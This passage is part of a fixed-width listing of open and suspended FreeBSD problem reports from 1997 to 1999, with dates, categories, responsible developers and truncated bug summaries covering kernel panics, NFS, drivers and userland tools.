to blinking block causes o [1997/06/08] gnu/3810 cvs can't handle multiple multiple-path d o [1997/06/18] kern/3899 df while unmounting floppy crashes 2.2.2 o [1997/06/19] kern/3909 joerg A patch supporting some new worm drivers o [1997/06/19] gnu/3910 sort(1) of 2.2.1R doesn't work in special o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/06/29] bin/3986 rdist seg faults when target machine is d o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f o [1997/07/02] misc/4013 boot floppy hangs if IDE ZIP Drive presen s [1997/07/06] gnu/4042 gdb stackframe in static library shows no o [1997/07/12] bin/4078 sos Typed password to log in on console and i o [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/26] bin/4176 restore gets confused when run over pipe f [1997/07/27] ports/4179 fenner lmbench-1.1 dumps core after asking for m o [1997/07/28] kern/4186 peter nfsiod, panic, page fault in kernel mode o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/06] kern/4240 kernel fails to recognise 2nd serial port o [1997/08/08] conf/4252 peter sendmail doesn't use smrsh by default o [1997/08/10] kern/4260 EOF handling in st(4) is broken o [1997/08/10] kern/4265 Panic in dsinit when multiple FreeBSD sli o [1997/08/10] kern/4270 ch driver does not use bounce buffers o [1997/08/12] kern/4284 le0 goes OACTIVE after some time o [1997/08/13] kern/4295 SL/IP difficulties between 2.2.1 & 2.2.2 o [1997/08/16] kern/4312 arp table gets messed up, syslog "gateway o [1997/08/17] kern/4327 peter NFS over TCP reconnect problem s [1997/08/19] kern/4338 New device driver (Cyclades Cyclom-Z) o [1997/08/22] bin/4357 wosch bug in adduser script causes duplicate UI o [1997/08/25] kern/4381 mount -t msdos causes panic:vm_fault o [1997/09/02] kern/4454 X drops characters/locks up keyboard when o [1997/09/03] bin/4460 lpd hangs exiting (IE in ps table) o [1997/09/10] kern/4508 peter nfs3 data integrity problems o [1997/09/11] kern/4513 System lockup appears to be VM related. o [1997/09/14] i386/4533 Server with Cyclom-Y PCI card rebooted at o [1997/09/20] kern/4588 peter NFS access locks up o [1997/09/21] kern/4600 peter nfs lookups might give incorrect result o [1997/09/30] kern/4663 checkalias panic o [1997/10/01] kern/4666 dfr umount -f doesn't seem to work o [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/03] bin/4683 imp restore doesn't correctly handle "sparse" o [1997/10/05] docs/4691 no documentation for mk_cmds(1) o [1997/10/16] kern/4774 trying to use IBCS2 shared libraries cras o [1997/10/16] kern/4782 Under certain conditions, several krsh's o [1997/10/31] kern/4909 de ethernet driver is crazy on 100base o [1997/11/01] bin/4913 peter Large mail messages can cause mail.local o [1997/11/03] kern/4927 kernel does not check any quota and permi o [1997/11/05] kern/4945 continued failure to use the Adaptec 1460 o [1997/11/05] bin/4949 rpc.rquotad stat()s fs with quota file in o [1997/11/09] kern/4990 peter NFS hangs under FastEthernet. 1024 Bytes o [1997/11/15] conf/5062 login.access not evaluated correctly a [1997/11/18] bin/5084 ru wrong "term" for internal shell o [1997/11/18] kern/5085 System crash during mount command for CD o [1997/11/22] gnu/5126 C++ compiler bug (assembly output) o [1997/11/23] i386/5128 Adaptec 2940U Timeouts with QUANTUM disk o [1997/12/06] kern/5244 F00F workaround dosn't always work on SMP s [1997/12/14] bin/5297 make incompatibility with System V style o [1997/12/19] kern/5347 peter DEC (de0) ethernet card has no buffers af o [1997/12/30] kern/5396 fdesc fs crashes system o [1997/12/31] i386/5401 peter de0 selects wrong media when reconnected f [1998/01/08] kern/5456 After writing more than 100MB to SCSI Exa o [1998/01/16] kern/5513 luigi new PnP code is BAD (soundcards) s [1998/01/19] kern/5522 [PATCH] ip_input.c & ip_output.c problems o [1998/01/26] misc/5574 bootpd gets timezone incorrectly o [1998/01/27] kern/5587 session id gets dropped o [1998/01/29] kern/5598 Support for magneto-optic SCSI devices wi s [1998/01/30] bin/5604 setenv(3) function has memory leak, other o [1998/01/31] kern/5611 bind does not check sockaddr->sin_family o [1998/02/01] kern/5618 kernel memory leak in routetbl. o [1998/02/01] kern/5624 dumping to tape causes scsi bus reset o [1998/02/04] kern/5643 NCR 810/815 do not handle rewind correctl o [1998/02/09] bin/5693 hoek groff -mm or groff -mmm ??? o [1998/02/10] i386/5698 des LPIP causes spurious reboots o [1998/02/12] kern/5728 peter NFS hangs o [1998/02/12] kern/5731 peter executables wedge on "vmopar" when built o [1998/02/17] gnu/5767 man leaves partially formatted cat pages o [1998/02/19] kern/5794 Kernel Panic f [1998/02/27] bin/5867 peter pppd or FreeBSD ? o [1998/02/28] kern/5877 sb_cc counts control data as well as data o [1998/03/01] kern/5890 peter NFS server Side say NFSERR_BAD_COOKIE (rm o [1998/03/09] bin/5959 Cannot set up clocal gettys o [1998/03/10] kern/5969 non-root user can reboot/lock up system o [1998/03/11] kern/5975 can't boot freebsd: fatal trap12: page fa o [1998/03/14] conf/6002 peter /etc/mail/sendmail.cf.addtions seems to l o [1998/03/16] kern/6035 The system "sort-of" hangs when playing b o [1998/03/19] kern/6066 lnc driver does not work correctly with A o [1998/03/20] bin/6074 imp Incremental dumps are backing up unchange o [1998/03/22] i386/6099 des LPIP to slow machine causes hang o [1998/03/22] kern/6103 panic: ffs_valloc: dup alloc o [1998/03/28] bin/6162 kinit does not default to the current use o [1998/04/03] kern/6203 kernel panics with "blkfree: freeing free o [1998/04/03] conf/6205 NFS/NIS freak out o [1998/04/04] kern/6212 Two bugs with MFS filesystems fixed, one o [1998/04/07] kern/6238 luigi Sound-driver patch for MAD16 (OPTi 928,92 o [1998/04/08] kern/6251 peter ktrace very broken when logging over NFS o [1998/04/08] kern/6252 ide cdrom hangs system when on same bus a o [1998/04/09] kern/6253 Atapi wait for command phase too short. o [1998/04/10] kern/6267 dg panic: pmap_dispose_proc: upage already m o [1998/04/14] kern/6300 System locks up in SMP mode when accessin o [1998/04/17] kern/6336 peter NFSv3 should support files >2GB, but does o [1998/04/18] kern/6344 cy driver is outdated o [1998/04/19] kern/6351 DPT RAID controller stops working under h o [1998/04/20] i386/6368 Stallion Easyio 8 port not detected using o [1998/04/22] bin/6383 csh - when ctrl-d is pressed, file is chm o [1998/04/25] kern/6412 peter NFS sends packets from the wrong interfac o [1998/05/03] kern/6506 system will not soft reboot f [1998/05/05] kern/6525 Coral-Draw 5 CD crashes 2.2.6-STABLE a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty o [1998/05/08] bin/6557 /bin/sh is broken o [1998/05/10] bin/6577 /bin/sh environment variables not set in o [1998/05/11] ports/6591 se KDE starts /usr/bin/kzip instead of /usr/ o [1998/05/12] kern/6603 ncr driver hangs under high load o [1998/05/12] bin/6609 gmp.h not installed o [1998/05/17] kern/6670 PANIC on boot with FreeBSD 3.0 (same comp s [1998/05/19] kern/6686 [STABLE] -stable does not support large I o [1998/05/20] kern/6706 mount_msdos+mount_null+mc=panic o [1998/05/25] kern/6751 audio cd play suddenly stops. o [1998/05/25] kern/6755 peter Tulip (if_de) driver buggy in -current o [1998/05/27] kern/6771 peter panic: Bad nfs svc reply s [1998/05/27] misc/6773 [PATCH] tempnam.c security problems o [1998/06/01] misc/6824 peter Intel EtherExpress 100+, 2.2.6 NFS troubl s [1998/06/02] bin/6830 make(1) exhibits confusing and non-standa s [1998/06/04] kern/6854 [PATCH] probing brooktree849 capture card s [1998/06/04] kern/6858 inetd in realloc(): warning: junk pointer o [1998/06/04] misc/6861 [PATCH] netboot error o [1998/06/05] kern/6865 OS crashes when exiting shell with suspen o [1998/06/10] kern/6908 kernel crash from user land o [1998/06/19] bin/6994 The netstat(1) -s generates wrong output f [1998/06/19] i386/6996 Occasional complete lockup of 2.2.5R s [1998/06/22] bin/7019 [security] pwd.db almost always contains s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] kern/7038 shimon Kernel panic caused by DPT driver (Got a s [1998/06/24] bin/7043 the fstat command doesn't know ISOFS, MSD o [1998/06/24] i386/7057 3Com 3C509 locks up, or has >1000ms rtt u s [1998/06/24] bin/7059 sh dumps core on this script o [1998/06/24] ports/7061 ache fspclient's grab command fails (and remov o [1998/07/05] ports/7167 ache elm cannot pgp for more than one recipien s [1998/07/05] kern/7169 cannot use accton on a append-only file o [1998/07/05] kern/7178 sos IDE Western Digital hard disk detection e s [1998/07/06] misc/7190 jkh "Invalid partition table" after new insta s [1998/07/10] kern/7237 NCR SCSI driver ch0 troubles o [1998/07/11] kern/7245 processes die with signal 6, if machine o o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c o [1998/07/21] conf/7354 source distribution selection bug when in f [1998/07/22] kern/7367 panic: malloc: wrong bucket o [1998/07/23] ports/7383 torstenb socks5 + ssh + redirection not working o [1998/07/26] kern/7405 in pmap_changebit, pmap_pte_quick() retur s [1998/07/27] kern/7410 [PATCH] driver for arlan-655 s [1998/07/27] i386/7420 [PATCH] Maximum socket buffer size (SB_MA o [1998/07/28] kern/7424 Machine crashes do not occur very often, o [1998/07/30] bin/7446 jdp Dlopen succeed in particular cases, but i o [1998/08/04] ports/7490 ache `setenv LANG/LC_CTYPE C` makes tcsh unusa s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/08/10] kern/7557 -current machine running Diablo, lockup, s [1998/08/10] kern/7561 CDROM (wcd) is prone to lock up system/pr s [1998/08/10] kern/7562 Running wine can cause other applications o [1998/08/12] bin/7587 There is no pthread_cancel() in libc_r.a! o [1998/08/18] kern/7658 (1) rlogin from some host to the FreeBSD o [1998/08/18] kern/7664 scsiformat reports '0' for all parameters o [1998/08/18] conf/7665 sysinstall quits silently o [1998/08/19] kern/7678 Problems with a 386-16 f [1998/08/20] i386/7698 n_hibma scotty/tkined library error o [1998/08/23] kern/7727 Processes get wedged in 'getblk' on 2.2.7 o [1998/08/27] kern/7754 kernel panics if NFS server uses LKM vs. o [1998/08/27] bin/7756 disklabel misbehaving on seriously sick d o [1998/08/27] kern/7764 ps(1) hangs in pfslck/lockrd - All subseq o [1998/08/27] kern/7766 de driver still buggy - random ifc death o [1998/08/27] kern/7767 de driver still buggy - power cycle of de o [1998/08/30] kern/7781 Problem with setpassent(), getpwnam() and o [1998/09/01] kern/7797 System halted with "panic: pmap_release: o [1998/09/02] i386/7815 probe can't find wdc0 s [1998/09/03] gnu/7821 awk in free(): warning: chunk is already o [1998/09/03] conf/7823 sysinstall will not install XFree o [1998/09/09] bin/7872 [PATCH] mountd(8) can apply flags to wron o [1998/09/09] bin/7876 gethostbyname flags temporary failure as o [1998/09/09] bin/7877 billf libpcap and tcpdump need updating o [1998/09/10] kern/7880 mount_cd9660 incorrect on multitrack CD-R o [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/12] conf/7908 wrong perms on objformat after upgrade o [1998/09/15] ports/7931 torstenb Ssh allows root login with no password o [1998/09/16] kern/7950 Trap 12 while executing wine o [1998/09/16] gnu/7951 The gnu readline library core dumps when o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas a [1998/09/19] ports/7987 ports Can't post news with TRN + NNTPCACHE o [1998/09/22] conf/8031 [patch] /etc/rc looks for /etc/sendmail.c o [1998/09/28] misc/8070 can't get a system with an NCR 810 contro o [1998/09/28] i386/8081 Problem with MULTIPORT driver and Boca BB o [1998/09/29] bin/8085 sendmail startup could be backgrounded f [1998/09/29] ports/8088 torstenb short writes using ssh-1.2.* o [1998/09/30] gnu/8099 [patch] some bugs in cpio o [1998/10/03] kern/8137 [patch] quotaoff followed by quotaon can o [1998/10/05] kern/8158 sio driver breaks in 2.2.7R in kernels wi o [1998/10/06] kern/8180 open("..",O_RDONLY|O_NONBLOCK) fails o [1998/10/07] bin/8195 ee dumps core on window resize o [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/10/08] kern/8215 Creating 2 root partitions in sysinstall o [1998/10/11] bin/8266 [patch] nfsd should allow just nfs versio o [1998/10/12] bin/8281 writev() in libc_r causes loop o [1998/10/13] kern/8312 Under heavy load, the system panics with o [1998/10/14] bin/8322 Mail doesn't respect REPLYTO in .mailrc o [1998/10/14] kern/8324 failure to deliver SIGIO when fildes mark o [1998/10/19] conf/8379 check_rcpt returns OK for nonexistent add o [1998/10/20] kern/8380 swap_page error: out of swap space o [1998/10/20] i386/8385 2.2.7 hangs while detecting type of COM1' o [1998/10/20] ports/8394 peter rdist6 won't compile--tries to use MOUNT_ o [1998/10/21] i386/8397 Code using popen compiled on BSDI BSD/OS o [1998/10/22] i386/8414 ibcs2 emulation sets serial baud-rate inc o [1998/10/22] kern/8415 SMP kernel freezes while downloading larg s [1998/10/22] kern/8417 3.0 config(8) doesn't check that root fs o [1998/10/22] i386/8418 sh MAKEDEV all - fails to create hard lin o [1998/10/23] kern/8423 Intel PILA8461 NIC panics 2.2.7 during pr o [1998/10/24] i386/8435 boot.flp does not give shell prompt after o [1998/10/24] bin/8440 jkh 3.0-RELEASE has wrong permissions on game o [1998/10/28] misc/8480 odd Korean timedef(LC_TIME) o [1998/10/31] bin/8518 freopen() in append mode followed by ftel o [1998/11/01] kern/8534 insufficient support routines for poll(2) o [1998/11/03] kern/8561 /kernel inode change time changes every r o [1998/11/03] i386/8567 Intel EtherExpress Pro/10 driver (if_ex.c o [1998/11/04] bin/8573 nvi 1.79 SIGSEGVs on any address in .exrc o [1998/11/05] kern/8580 Hanging NFS pagein in nfs_bio.c (2.2.7, w o [1998/11/07] kern/8590 kernel incorrectly recognizing Maxtor 11. o [1998/11/07] kern/8596 panic: page fault while using ping's reco o [1998/11/08] kern/8607 maxprocsperuid setting causes sybase/linu o [1998/11/08] kern/8619 EXT2FS should be in GENERIC kernel o [1998/11/08] ports/8622 peter exmh2 has problems with some date formats s [1998/11/09] misc/8623 wollman [MFC] Time zone for Japan is strange (see o [1998/11/10] bin/8646 Implement rlogind -a option o [1998/11/11] kern/8655 Umount trouble of SCSI removable device o [1998/11/11] kern/8657 nfs client hung in nfs_bwrite/vfs_busy_pa o [1998/11/12] kern/8669 aio_write() and aio_read() do not work AT o [1998/11/14] kern/8683 sos Problems with Atapi in 3.0... o [1998/11/14] bin/8685 sending a SYST by ftp client closes conne o [1998/11/17] kern/8729 SYSV Semaphore blocks all threads o [1998/11/18] bin/8745 wosch adduser permit adding `root' and mail ali o [1998/11/20] kern/8773 Intel AN430TX motherboard ps/2 port not r f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S o [1998/11/23] kern/8824 Incorrect driver unit number in IDE BusMa o [1998/11/24] kern/8834 NFS can corrupt local file cache o [1998/11/24] conf/8854 boot.flp does not probe atapi cdrom o [1998/11/24] i386/8855 sos can't mount CD in ATAPI drive after eject o [1998/11/25] bin/8865 syslogd hangs with serial console a [1998/11/28] kern/8875 Patch to allow DMA IDE with generic chips o [1998/11/29] conf/8903 /etc/rc can do NFS mounts before the netw o [1998/12/01] i386/8924 File transfers. Upload is 71Kbs downloa o [1998/12/02] kern/8940 system clock runs extremely slowly (and s o [1998/12/06] kern/8981 this also fixes X crashes and sio silo ov o [1998/12/07] ports/9002 torstenb mirror reuses obsolete temporary db file o [1998/12/09] kern/9030 DMPno2 - PCCards are not being recognised o [1998/12/10] i386/9044 #.0 pkgs require libkrb o [1998/12/16] kern/9095 swap detect error o [1998/12/19] kern/9129 Is it miss take ? So, ep deriver dose not o [1998/12/20] i386/9140 NIS "Magic cookie" in master.passwd slays o [1998/12/21] kern/9163 [patch] squid does not join a multicast g o [1998/12/27] bin/9214 kldload(8) error messages are inadequate o [1998/12/30] i386/9244 2.2.8 RELEASE Fixit floppy doesn't work.. o [1998/12/31] bin/9252 [patch] login program "login" don't set K o [1999/01/03] kern/9296 pps driver missing header file o [1999/01/03] kern/9297 pps driver doesn't clear ppbus control po o [1999/01/06] bin/9350 nvi incorrectly reads files with very lon o [1999/01/06] kern/9355 can't select() for writes on a bpf o [1999/01/07] bin/9362 "lpc start queue" doesn't work in 3.0-R & o [1999/01/07] bin/9379 pppd does not go through all interfaces l o [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/09] kern/9407 "make kernel" yields buggy kernel in cera o [1999/01/09] kern/9408 parameter reversed to a pci_cfgwrite in p o [1999/01/09] kern/9411 System crash on swapping to hole-files o [1999/01/09] kern/9413 profiling does not work with elf kernels o [1999/01/10] i386/9431 wd.c Does nto recognize certain LBA disks o [1999/01/11] bin/9440 obrien amd can't mount filesystems with type:=uf o [1999/01/11] bin/9444 mount_mfs uses lots of swap. o [1999/01/12] bin/9464 fenner Fix for fetch ignoring FTP_PASSIVE_MODE e o [1999/01/13] kern/9478 support for running a script from kldload o [1999/01/14] kern/9487 pcm: mixer's synth and cd devices are swa o [1999/01/14] bin/9495 su doesn't look at login.cnf all the time o [1999/01/15] bin/9516 ftpd doesn't honor invalid shelll in logi o [1999/01/17] kern/9537 ep0 driver : no buffer space available o [1999/01/17] bin/9544 syntax error concerning loading vinum fro o [1999/01/17] kern/9548 UNION fs corrupts data and has undefined o [1999/01/17] kern/9550 The latest -current as of 17 January has o [1999/01/21] kern/9599 SMP hang after reseting CPU 1 o [1999/01/21] kern/9612 grog NFS mounts on dual-homed server may hang o [1999/01/22] docs/9618 hoek many typos in groff_mm(7) o [1999/01/24] ports/9665 ache cannot start apache server o [1999/01/25] kern/9673 ISO CD-ROM Problem o [1999/01/25] ports/9688 cwt The current tcl80 port has problems, does o [1999/01/28] i386/9759 Tar process hangs on buggy tapes o [1999/02/01] kern/9862 system crashes writing to msdos jaz disk o [1999/02/02] kern/9883 MGET()(and variants) return NULL with M_W o [1999/02/04] misc/9903 thread enabled program can't use popen/sy o [1999/02/04] kern/9910 Heavy traffic renders FreeBSD acting as f s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/06] i386/9933 No error reported writing to write-protec o [1999/02/06] kern/9935 vmstat reprots bad AVM values o [1999/02/08] kern/9961 When loading if_ppp_mod.o system crashes, o [1999/02/08] i386/9962 Install Panics in with integer divide fau o [1999/02/08] kern/9974 Large amounts of kernel clock drift with o [1999/02/09] kern/9980 savecore fails with large (2gig+) swap pa o [1999/02/09] bin/9982 inet_addr(3) should be return 32bit uint. o [1999/02/10] misc/10009 jdp dlopen will crash when opening some strip o [1999/02/11] kern/10021 MOUNTING A EXT2FS A AFTER MOUNTING AN MSD o [1999/02/11] bin/10031 ypxfr does not work with Solaris master s o [1999/02/11] bin/10039 Binaries from a "fixit" CD can't find ld- f [1999/02/12] docs/10059 sheldonh MALLOC(9) manpage not updated to reflect o [1999/02/13] kern/10066 problem with a X-Window and syscons drive o [1999/02/14] i386/10089 ATAPI tape driver (wst) doesn't handle En a [1999/02/14] ports/10094jfitz autogeneration of msql user failed o [1999/02/15] kern/10107 interlock situation with exec_map and a p o [1999/02/18] i386/10150 Compaq fxp0 Does not work on 3.0 or 3.1 b o [1999/02/18] i386/10151 ATAPI CD problem o [1999/02/19] conf/10163 init does not start when /var/msgs is a s f [1999/02/22] kern/10209 ru natd stopped to worked since i upgraded f o [1999/02/23] bin/10230 -T and -B not implemented on filehandles o [1999/02/25] misc/10259 FTP install hangs for 3.1-RELEASE o [1999/02/25] bin/10264 passwd(1) tryis NIS even with `-l' switch o [1999/02/25] kern/10265 file locking does not work with kernel pt o [1999/02/26] kern/10280 Display Adapters (PCI) probed wrong way - o [1999/02/28] misc/10302 installer o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible o [1999/02/28] kern/10316 le0 goes OACTIVE after some time o [1999/03/01] bin/10341 memory leak in setenv(3) o [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/03] ports/10373nate Increasing kernel file descriptors causes o [1999/03/03] kern/10381 hlfsd/NFS failure -- directory cached bet a [1999/03/04] ports/10385billf New port: apache13-modperl o [1999/03/05] kern/10411 top, vmstat, iostat show 0% cpu idle & us o [1999/03/06] misc/10418 libpam is built before libradius/libtacpl o [1999/03/07] kern/10466 resume causes crashes if BIOS extmem != R o [1999/03/08] kern/10492 broadcast IP address can be set on interf o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/09] bin/10511 incorrect return value in kvm_read(3) and o [1999/03/11] bin/10553 syslogd suddenly stopped logging o [1999/03/14] kern/10581 Kernel panic while using find on an ext2 o [1999/03/14] kern/10594 EXT2FS mount problems o [1999/03/14] bin/10596 I can't find out where someone is logged o [1999/03/15] misc/10599 [PATCH included]malloc/free breaks in cer o [1999/03/15] kern/10603 dcs Random system panics o [1999/03/15] kern/10607 Fast forwarding breaks when arp cache exp o [1999/03/16] bin/10615 make installworld DESTDIR=/some/dir o [1999/03/16] kern/10616 MSP3400C audio chip from Hauppauge WinTV- o [1999/03/16] i386/10626 RTC BIOS diagnostic error on install o [1999/03/16] bin/10633 obrien [patch] tcpslice timezone problem and upd o [1999/03/17] i386/10646 Bridge code missing from ed0 driver in 3. o [1999/03/18] ports/10665ports ports/graphics/sane needs access to /dev/ o [1999/03/19] kern/10671 setlogin(2) return EINVAL for length of n o [1999/03/19] kern/10676 3.1-RELEASE deadlocks under load with pro o [1999/03/20] kern/10698 de driver doesn't work with some tulip bo o [1999/03/23] kern/10747 [PATCH] ipfirewall `deny' rules act as `r o [1999/03/24] bin/10774 sio0 doesn't work well, i belive the prob o [1999/03/24] kern/10778 "ipforward_rt" is not cleared when routin o [1999/03/25] bin/10784 `make aout-to-elf-build' died in /usr/src o [1999/03/25] bin/10785 make aout-to-elf-install died in info tar o [1999/03/25] kern/10789 Second config of kernel doesn't overwrite o [1999/03/26] bin/10805 h2ph incorrectly deals with #error and #w o [1999/03/26] bin/10807 host(1) is broken - multiple options in o o [1999/03/27] bin/10821 des getpwent() fails on NIS clients after dro o [1999/03/29] i386/10862 wd.c STILL cannot recognize correct disk o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec o [1999/03/30] misc/10879 Cannot build aout binaries under 3.1-RELE o [1999/03/30] bin/10880 Profiler libraries missing o [1999/04/01] bin/10912 /bin/sh: Fix to prevent infinite loops on o [1999/04/03] i386/10928 su reboots the system after one day uptim o [1999/04/03] i386/10935 PCI cards detected twice o [1999/04/04] ports/10946se kdm 1.1 does not work correctly - XBINDIR o [1999/04/05] bin/10963 brian date -v dosen't quite work o [1999/04/05] i386/10969 kernel fails to compile with ccs0 o [1999/04/06] i386/10983 lnc NIC driver doesn't work o [1999/04/06] bin/10991 lpd hangs system if printer not ready on f [1999/04/07] ports/11003ports wmcdplay is not capable of playing an AUD o [1999/04/07] kern/11004 Quota Issues on SMP o [1999/04/07] bin/11005 `umount -f' does not work if the NFS-serv o [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim o [1999/04/10] ports/11059ache ports/security/pgp does not extract o [1999/04/11] kern/11080 fatal trap 18 while trying to mount inval o [1999/04/11] kern/11084 3.1-R kernel trap 12 with interrupts o [1999/04/13] kern/11115 Sockets die in LAST_ACK and FIN_WAIT_1 st o [1999/04/13] bin/11119 NFS quotas fail to report if alternate fi o [1999/04/14] bin/11137 /bin/ps output loses the values for all p o [1999/04/16] kern/11164 The ie network driver panics during the i o [1999/04/16] bin/11169 warning: pointer to wrong page in cron(8) o [1999/04/18] kern/11199 3.1-RELEASE kernel page fault (trap 12) u o [1999/04/18] i386/11200 AMD PCnet lnc0/lnc1 problem o [1999/04/18] kern/11208 Complete system hang/freeze. No PANIC me o [1999/04/19] bin/11221 comm doesn't obey current locale collatio o [1999/04/20] bin/11247 fetch doesn't notice FTP error after RETR o [1999/04/21] kern/11255 Fore System ATM Card not working o [1999/04/21] kern/11266 frequent crashes with "Page fault, fatal o [1999/04/22] bin/11283 fetch http-timeout/timestamp bug o [1999/04/23] i386/11291 anic: ffs_alloccg: map corrupted o [1999/04/23] bin/11296 fetch(1) fails to resolve names in http m o [1999/04/26] conf/11336 Broken data sent to printer through devic o [1999/04/28] kern/11366 Filesystem can cause hang/crash in certai o [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/04/29] bin/11382 generated code using rpcgen with -b optio o [1999/04/29] kern/11385 PCNet/PCI Ethernet adapter works in 3.1-R o [1999/04/29] i386/11395 ghostscript5.50 does not print properly, o [1999/04/30] kern/11405 pwd_mkdb with no tmp space leads to kerne o [1999/05/02] i386/11454 mkdir() and chdir() doesn't check argumen o [1999/05/03] kern/11462 CS network interface driver (for CS89XX b o [1999/05/03] bin/11464 obrien union copies likely broken for alpha egcs o [1999/05/03] ports/11465ports The port chipmunk will not run. o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 msmith CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] kern/11513 cannot mount CD-ROM: Device not configure o [1999/05/05] misc/11523 3.1-STABLE BRIDGE option does not work o [1999/05/05] misc/11525 [PATCH] Networking patches to increase # o [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/07] kern/11563 pci_unmap_int doesn't do anything o [1999/05/10] ports/11636jfitz p5-Mail-Folder missing dependencies o [1999/05/12] i386/11664 lnc1 NIC fail to work o [1999/05/12] bin/11666 ypserv fails to reply host name resolutio o [1999/05/12] kern/11679 httpd and perl5 processes stuck in "nocha o [1999/05/13] kern/11686 APM: Always "Resume failure" from suspend o [1999/05/13] kern/11692 3.1-stable deadlock o [1999/05/13] kern/11697 dg Disk failure hangs system o [1999/05/14] i386/11720 FreeBSD 2.2.8 can't load fixit disk o [1999/05/18] kern/11766 Can not traceroute through ipnat. o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/19] misc/11778 mpz_get_str() in libgmp leads up to cored o [1999/05/19] misc/11790 boot manager bug o [1999/05/20] misc/11800 gibbs Problem with scsi AHA2940 and sony SDT-20 o [1999/05/20] i386/11801 Remounting CD on IDE CDROM after eject fa o [1999/05/20] ports/11807jfitz Port update: net/ratoolset o [1999/05/20] kern/11808 read/write mounted write-protected floppi o [1999/05/21] kern/11815 mjacob SCSI tape driver fails on media type reco o [1999/05/21] kern/11821 /dev/fd0a hangs on large files, including o [1999/05/22] docs/11852 jkh 3.X install requires 12MB of RAM, not 8 o [1999/05/23] kern/11867 Sound driver loses interrupts, no sound o [1999/05/28] kern/11911 3.1-R : writing file larger than floppy s o [1999/05/28] conf/11913 jkh Problem about /stand/sysinstall and /etc/ o [1999/05/28] kern/11915 access system call says file is readable o [1999/05/28] kern/11919 kldload doesn't return error on loading a o [1999/05/28] kern/11922 missing reentrant interfaces for getpwnam o [1999/05/29] kern/11928 kldload loads kernel modules even if ther o [1999/05/29] ports/11935ports ports/audio/dap: -DBIGENDIAN is wrong on o [1999/05/29] kern/11936 wine don't work (SMP) (-STABLE) o [1999/05/29] kern/11937 vm problems after havy memory usage o [1999/05/31] kern/11969 VM_fault with mmap'd CDROM data. o [1999/06/01] ports/11977ports Eterm port is unable to access .Xauthorit o [1999/06/02] i386/11991 fdisk does not assign slices to unused pa o [1999/06/02] bin/11992 /usr/src/sbin/mountd/mountd.c has '#ifdef f [1999/06/03] ports/12015torstenb new postfix port o [1999/06/04] kern/12022 System clock timewarps o [1999/06/06] bin/12054 explicit -ltermcap after -lncurses causes o [1999/06/06] kern/12062 sa tape driver with Cipher 60M SCSI QIC t o [1999/06/08] bin/12091 syslog packets from a remote machine are o [1999/06/08] kern/12092 vpo driver not working in 3.2-RELEASE o [1999/06/09] kern/12104 Certain cdcontrol commands don't work pro o [1999/06/10] conf/12116 ASCII and US-ASCII locale wrongly aliased o [1999/06/10] bin/12120 named crashes. o [1999/06/10] gnu/12122 cc hangs on STDIN with -pipe and .s files o [1999/06/11] bin/12136 obrien /sbin/dhclient-script: weird route comman o [1999/06/11] bin/12137 something wrong with shell -- functions w o [1999/06/12] ports/12174ache bash terminate with corefile if pid > 320 o [1999/06/12] gnu/12175 gdb crashes with pids > 32736 o [1999/06/13] bin/12191 wcol is trying to allocate a shared memor o [1999/06/15] misc/12221 djpeg halt's freebsd box o [1999/06/15] ports/12234ports imlib-1.9.4/gdk_imlib/rend.c has syntax e o [1999/06/16] bin/12242 segmentation fault running /usr/bin/fmt o [1999/06/16] kern/12247 userlevel program let kernel hang o [1999/06/17] kern/12262 pcm sound driver with SB16pnp does not ap o [1999/06/18] bin/12272 The ctype locales print an error message o [1999/06/18] kern/12274 cd mount problem o [1999/06/20] kern/12305 clock() ticks backwards o [1999/06/21] kern/12320 error 6: panic: cannot mount root (2) o [1999/06/22] bin/12349 des 3.2-R inetd doesn't re-read ALL configura o [1999/06/25] conf/12387 CDROM boot failure on Thinpad 770X, 380ED o [1999/06/25] kern/12394 3.2-RELEASE, rl0 ethernet interface freez o [1999/06/28] kern/12434 signal 11 (core dumped) on mysqld when ma o [1999/06/29] ports/12446ports ssh port doesn't build o [1999/06/29] bin/12448 arp -s ip_address auto pub results in err o [1999/06/30] kern/12464 bad reference in struct vm_zone o [1999/07/01] kern/12484 [PATCH] bpf_filter() broken o [1999/07/03] bin/12496 yppush broken when pushing to 2 or more s o [1999/07/03] bin/12497 src/etc/periodic/daily/150.clean-hoststat o [1999/07/04] kern/12508 gdb fails to vmcore.0 o [1999/07/06] i386/12529 Linksys ether16 NE2000 compat. won't conf o [1999/07/06] bin/12538 getpwuid() NIS UID override fails o [1999/07/06] ports/12541ports gtk installs itself where it can't be fou o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/07] docs/12557 nik There are no man pages for the widely use a [1999/07/08] bin/12564 jkh Sysinstall can not use live filesystem fr o [1999/07/09] misc/12577 Can't link code using catopen o [1999/07/09] ports/12584stb directories made during 'make install' ar o [1999/07/13] kern/12632 Panic (trap 18) with Symbios SCSI control o [1999/07/14] ports/12637ports patch to help multi-byte support in windo o [1999/07/14] misc/12640 Can use 2nd 